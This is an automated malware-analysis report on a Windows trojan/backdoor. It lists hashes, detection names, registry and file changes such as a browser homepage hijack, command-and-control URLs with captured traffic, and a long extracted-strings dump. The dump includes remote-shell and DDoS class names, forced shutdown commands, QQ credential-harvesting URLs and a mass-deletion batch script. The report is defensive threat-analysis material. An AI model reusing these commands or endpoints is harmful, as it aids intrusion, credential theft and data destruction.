Trojan.GenericKD.3338245_4b8b3a80b4
Trojan:Win32/Startpage.PVO!bit (Microsoft), Backdoor.Win32.Hupigon.sqck (Kaspersky), BackDoor.Pigeon1.10442 (DrWeb), Artemis!4B8B3A80B48A (McAfee), Heur.AdvML.B (Symantec), Trojan-Dropper.Win32.Binder (Ikarus), Win32:GenMalicious-BMU [Trj] (Avast), Trojan.GenericKD.3338245 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericEmailWorm.YR, GenericInjector.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan-PSW, Trojan, Backdoor, Worm, EmailWorm, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 4b8b3a80b48a4f9ea1c1d472d2252b2b
SHA1: 5bb89cae73d474b64897cfd5106bda6fc92723b8
SHA256: b5ae89230d38f3e684c0f76da3d8e53080f38833791cd40164517224a0d63652
SSDeep: 49152:pkHYMdzB5phGWnp9TmM3fuETSIgxef5DWh2:yHYMlB5phGWnDio
Size: 2621440 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: Upack_Patch, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-26 05:27:50
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:348
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\dlldy[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\gengxin[1].htm (232 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
C:\svchost.exe (3797 bytes)
C:\Proxy.dll (151 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@xie6[1].txt (203 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\dlldy[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\gengxin[1].htm (0 bytes)
Registry activity
The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 51 38 FF 75 AE C7 85 21 91 00 F8 06 43 87 1A"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "www.2345.com/?k744606640!"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\InternetExplorer\Main]
"Start Page" = "www.2345.com/?k744606640o!"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"
The Trojan modifies the IE security-zone settings so that all local web nodes without dots that do not belong to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 6be57b5f84b3ae053023dbf7d64ab7e1 | c:\Program Files\Common Files\Microsoft Shared\MSInfo\svchost.exe |
| 09bb1d6f550faf017a09f391bae63d89 | c:\Proxy.dll |
| 6be57b5f84b3ae053023dbf7d64ab7e1 | c:\svchost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: ??????
Product Name: ??????
Product Version: 2.6.0.0
Legal Copyright: ??????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: ???????????!
Comments: ??????
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 985599 | 987136 | 4.50205 | e28ba08901e86eb24af042287fb0be3f |
| .rdata | 991232 | 1401650 | 1404928 | 4.52131 | 10d39b2f4fb0b3e2d8ac2712da43fd12 |
| .data | 2396160 | 487178 | 126976 | 3.89171 | 22627bcfa797712d62d10f1694ebbfa1 |
| .rsrc | 2883584 | 94416 | 98304 | 2.99211 | 1436dc4ad98f5e2b1e9b7a67c343a2b4 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://rj.xie6.cn/gengxin.asp?_r=17692 | |
| hxxp://rj.xie6.cn/xiazai/xzProxy.asp | |
| hxxp://rj.xie6.cn/dlldy.asp?cz=hqfwq&bs=QINGQIU | |
| hxxp://rj.xie6.cn/dlldy.asp?cz=hqzjip | |
| 778691.dowei8.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /dlldy.asp?cz=hqfwq&bs=QINGQIU HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
User-Agent: 5349
Host: rj.xie6.cn
Cache-Control: no-cache
Cookie: __cfduid=d20f2012503565353f9d40ef5f666b9521469525508; ASPSESSIONIDQARSDDQB=BBIBCPFDPLOBFNEDLIJOAAKO
HTTP/1.1 200 OK
Date: Tue, 26 Jul 2016 09:32:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 2c86d7fcb0ab3ff6-SOF
ok:115.28.160.178:6400|115.28.160.178:6000|
GET /dlldy.asp?cz=hqzjip HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Host: rj.xie6.cn
Cache-Control: no-cache
Cookie: __cfduid=d20f2012503565353f9d40ef5f666b9521469525508; ASPSESSIONIDQARSDDQB=BBIBCPFDPLOBFNEDLIJOAAKO
HTTP/1.1 200 OK
Date: Tue, 26 Jul 2016 09:32:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 2c86d81515343ff6-SOF
ip:194.242.96.218
GET /gengxin.asp?_r=17692 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: rj.xie6.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 26 Jul 2016 09:32:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d20f2012503565353f9d40ef5f666b9521469525508; expires=Wed, 26-Jul-17 09:31:48 GMT; path=/; domain=.xie6.cn; HttpOnly
Cache-Control: private
Vary: Accept-Encoding
Set-Cookie: ASPSESSIONIDQARSDDQB=BBIBCPFDPLOBFNEDLIJOAAKO; path=/
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 2c86d73ca16c403e-SOF
GET /xiazai/xzProxy.asp HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: rj.xie6.cn
Connection: Keep-Alive
Cookie: __cfduid=d20f2012503565353f9d40ef5f666b9521469525508; ASPSESSIONIDQARSDDQB=BBIBCPFDPLOBFNEDLIJOAAKO
HTTP/1.1 522 Origin Connection Time-out
Date: Tue, 26 Jul 2016 09:32:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Server: yunjiasu-nginx
CF-RAY: 2c86d793bf58403e-SOF
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
user32.dll
gdiplus.dll
Kernel32.dll
kernel32.dll
KERNEL32.DLL
ntdll.dll
psapi.dll
IPHLPAPI.DLL
iphlpapi.dll
ole32.dll
Proxy.dll
shell32.dll
winmm.dll
advapi32.dll
GdiPlus.dll
wininet.dll
shlwapi.dll
ws2_32.dll
Gdiplus.dll
Ole32.dll
EnumWindows
GetAsyncKeyState
SetTcpEntry
GetExtendedTcpTable
RegCloseKey
RegCreateKeyA
RegOpenKeyA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}139550467
crossfire.exe
10031950
10031830
03023050
05015260
03018280
03693502
90 90 90 90 90
03023052
03693509
03156229
TenSafe_1.exe
TenSafe_2.exe
GameDataPlatformServer.exe
Tencentdl.exe
CrossProxy.exe
d3d9.dll
TerSafe.dll
AudioHook.dll
CrossFire.exe
00000000
10000000
TenSP.dll
TenRpcs.dll
TenSLX.dll
crossfireBase.dll
BugTrack.dll
MSVCR90.dll
fmodex.dll
mswsock.dll
MSVCR80.dll
999999999
07000000
NTDLL.DLL
TenSafe.exe
Tensafe_1.exe
Tensafe_2.exe
tgp_gamead.exe
TXPlatform.exe
BackgroundDownloader.exe
TenQQDLSafe.exe
cmd.exe
CrossSSOHOlder.exe
0000260000
0000330000
0100260000
0100340000
0200260000
0300260000
0400260000
0500260000
0600260000
0700260000
0800260000
0300000001
0000790000
0000040000
0000000001
/svchost.exe
.idata
.rdata
P.reloc
P.rsrc
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp
THintActionD%C
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute
svchost.exe
778691.dowei8.com
127.0.0.1
%Program Files%\ie8\
Windows
iexplore.exe
SourcePort
DestPort
UnitTCPIP
TCPIPORT
TCPIPORT4
1.2.3
<?xml version="1.0" encoding="UNICODE"?><tree2xml app="SVCHOST.exe">
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
(The key is too long to be read.)
HKEY_DYN_DATA
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
cmd /c "
%dMB,
" WindowsPath="
" ExeShortName="
" ExeFileName="
\Software\Microsoft\Windows\CurrentVersion\uninstall
\software\microsoft\windows\currentversion\uninstall\
TRemoteShellCmdU
TtcpDDOSThread
TwebDDOSThread
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
hXXp://
cmd /c shutdown -s -f -t 0
cmd /c shutdown -r -f -t 0
Down.exe
Set objws=WScript.CreateObject("wscript.shell")objws.Run kavpath,,true
ctfmon.exe
Move.exe
Port
UDPSockError
TMYNMUDP
MYNMUDP
RemotePort<
LocalPort<
ReportLevelL
0.0.0.0
%d.%d.%d.%d
FilterGraph %p pid %x
D:\dat_aq\DSPACK234\src\DSPack\DSUtil.pas
($%x).
vpDoNotRenderColorKeyAndBorder
Operation
TOnDVDCMD
CmdID
OnDVDCMDStartx0I
OnDVDCMDEndL[A
OnDVDWarningFormatNotSupportedL[A
D:\dat_aq\DSPACK234\src\DSPack\DSPack.pas
FormKeyDown
Msxml2.XMLHTTP
\Program Files\Internet Explorer\iexplore.exe
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
GetKeyboardType
RegOpenKeyExA
ReportEventA
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
CreatePipe
mpr.dll
version.dll
gdi32.dll
SetViewportOrgEx
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
SetProcessWindowStation
OpenWindowStationA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetProcessWindowStation
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumThreadWindows
CloseWindowStation
ActivateKeyboardLayout
ShellExecuteExA
ShellExecuteA
SHFileOperationA
InternetOpenUrlA
URLMON.DLL
URLDownloadToFileA
wsock32.dll
avicap32.dll
imagehlp.dll
ADVAPI32.DLL
DeleteUrlCacheEntry
quartz.dll
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
(*),,,0001
!!! ###%%$
n.2.Ýdddddddd
KWindows
UrlMon
.ScktComp
IMYNMUDP
CMDUnit
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
VMROptions.Mode
MediaType.data
BaseFilter.data
<requestedExecutionLevel level="requireAdministrator"/>
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
crossfire.exe.
192.168.0.100
60.174.156.33
1024*768
atl71.dll
.inidata
@.reloc
CNotSupportedException
CCmdTarget
commctrl_DragListMsg
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
KERNEL32.dll
ADVAPI32.dll
WS2_32.dll
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
WINSPOOL.DRV
comdlg32.dll
SHELL32.dll
SWNPM.dll
.PAVCException@@
.PAVCArchiveException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
4"5(5,50545
8!8/878=8
3"32383|3"4
2 3=3Q3^3h3r3z3
4 41484[4}4
9$9(9,90989
<0=4=8=<=
H%X0C
=0.pK
Z,7
it.Dx
Kc%S*3
](.FuX
.pLUBa
.AMUr_
WINMM.dll
DLL.dll
myDrawIndexedPrimitive_2
*@CShell.dll
10139320
31 57 29 9
84 22 14 70 6
84 22 14 70 4
31 69 62 88 98
35 38 72 78 43
33 72 07 08 45
33 00 83 60 77
02267964
06000000
/Proxy.dll
f9z.vk
CreateIoCompletionPort
GetProcessHeap
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
SHLWAPI.dll
Proxy_1.271.dll
HNetCfg.FwMgr
/gengxin.asp?_r=
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
_.tmp
https
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
@hXXps://
@/dlldy.asp?cz=hqfwq&bs=QINGQIU
/dlldy.asp?cz=hqzjip
http:
Client:VVV.xie6.cn
[email protected]
urlmon
WinINet.dll
program internal error number is %d.
%s%x.tmp
:"%s"
:"%s".
<Msg%s>%ld</Msg%s>
0000%d
</Msg0000>
<Msg0000>
EMSG
Recv Sub Packet(%s)..
Recv Packet (%s)...
zcÁ
3<3I3Z3q3{36l6Q6^6n6
VVV.2345.com/?k744606640
VVV.2345.com/?keyybc
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\MainHKEY_CLASSES_ROOT
{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}{B96B3CAB-0728-11D3-9D7B-0000F81EF32E}hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?uin=
skey
qun.qzone.qq.com
for(var i=0,len=str.length;i<len; i){hash =(hash<<5) str.charCodeAt(i);
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
hXXps://
hXXp://ui.ptlogin2.qq.com/cgi-bin/login?appid=710044101&s_url=hXXp://ctc.qzs.qq.com/ac/qzone/widget/login/succ.html&style=13&hide_title_bar=1&daid=151
if not "%choice%"=="" set choice=%choice%
If /I "%Choice%"=="1" Goto xtlj
If /I "%Choice%"=="2" Goto kkhc
If /I "%Choice%"=="3" Goto ttsc
If /I "%Choice%"=="A" Goto ALL
If /I "%Choice%"=="" exit
del /f /s /q %systemdrive%\*.tmp
del %windir%\2950800.txt /f /q
for /f %%i in (%windir%\2950800.txt) do rd %windir%\%%i /s /q
dir %windir%\$NtUninstall* /a:d /b >%windir%\2950800.txt
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.pnf
del /f /s /q %systemdrive%\infcache.1
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
del /f /s /q %windir%\system32\cid_store.dat
md %windir%\system32\cid_store.dat
attrib s h r %windir%\system32\cid_store.dat
del /f /s /q %windir%\system32\pub_store.dat
md %windir%\system32\pub_store.dat
attrib s h r %windir%\system32\pub_store.dat
del /f /s /q %windir%\system32\xlhcc.dat
md %windir%\system32\xlhcc.dat
attrib s h r %windir%\system32\xlhcc.dat
rd /s /q "c:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "d:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "e:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "f:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "G:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "h:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "I:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "j:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "k:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "l:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "m:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "n:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "o:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "p:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "q:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "r:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "s:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "t:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "u:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "v:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "w:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "x:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "y:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "z:\$recycle.bin\vod_cache_data" 2>NUL
%WinDir%\
google chrome
Google Chrome
Super-EChXXp://ec.360bc.cnhXXp://VVV.eyybc.com/forumdisplay.php?fid=17/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php
hXXp://VVV.super-ec.cn
<input type="text" name="field_2new" size="25" value="" disabled class="txt" />" class="txt" />Function Getcpuid()
Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")getcpuid=cpu.ProcessorId
{633C80A4-1843-482b-9EF2-BE2834C5FDD4}*.txt
|*.txt
Webdings
g_kj_web
g_kj_msg
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.18
%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Broken pipe
Inappropriate I/O control operation
Operation not permitted
MPR.dll
VERSION.dll
AVIFIL32.dll
RASAPI32.dll
CreateDialogIndirectParamA
GetViewportOrgEx
GetViewportExtEx
RegEnumKeyA
oledlg.dll
WSOCK32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
%s\ESPI%d.dll
hXXp://dywt.com.cn
[email protected]
86(0411)88995834
86(0411)88995831
(ESPINN.dll(NN
This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit VVV.dywt.com.cn/info
CallerInfoCopyCmd
SetIPPort
GetIPPort
"C:\Windows\System32\ESPI11.dll"
ProviderInstallCopyCmd
SockDataCopyCmd
SockAddrCopyCmd
enetintercept_fnSockAddrSetIPPort
enetintercept_fnSockAddrGetIPPort
enetintercept_fnInstallCopyCmd
enetintercept_fnSockDataCopyCmd
enetintercept_fnSockAddrCopyCmd
enetintercept_fnCallerInfoCopyCmd
%s,%d
%s.lnk
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
;3 #>6.&
'2, / 0&7!4-)1#
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCOleException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCOleDispatchException@@
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" 